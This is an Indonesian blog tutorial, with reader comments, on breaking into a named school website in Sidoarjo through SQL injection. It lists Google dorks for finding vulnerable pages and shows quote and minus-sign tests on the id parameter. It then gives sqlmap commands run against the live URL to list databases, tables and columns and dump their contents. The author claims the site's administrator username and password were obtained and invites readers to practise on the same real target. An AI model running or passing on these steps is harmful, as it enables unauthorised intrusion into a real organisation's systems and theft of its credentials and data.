Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork bertebaran di Google. Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
http://www.sman2sidoarjo.sch.id/
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda - (minus) sebelum nomor id tersebut.
Contoh :
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5
Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah
“cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.
Kemudian untuk mencari nama database, ketikkan
“ ./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs”
(tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini :
Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.Setelah itu akan muncul beberapa Tabel.
Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.
Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut :D
Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ?
Nah, tinggal cari Login Adminnya deh
Caranya banyak kok di Google
Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live target http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5
Salaaaam kambose....dan slaaaam kaupi...buat si punya blog...terima kasih banyaak telah berbagi...
BalasHapushahaha
BalasHapusMas, minta link backtracknya dong..
BalasHapusmantap gan
BalasHapusCara menemukan id= itu gi mna,trus kok bisa tahu "berita_lengkap" itu dri mn ?
BalasHapusito google dork
Hapusitu pake kali linux 2.0????
BalasHapusbacktrack
HapusHahaha
Hapusmasih pake backtrack gan?! udah ada kalilinux!
BalasHapusdan... makasih infonya ya
daru sekian banyaj Blog Blog ini yg gw ngerti,bikin Chanel Yt aja gan
BalasHapusbang pake Linux ya kalo lake windows gimana
BalasHapusbisa tutorialnya banyak di youtube
Hapus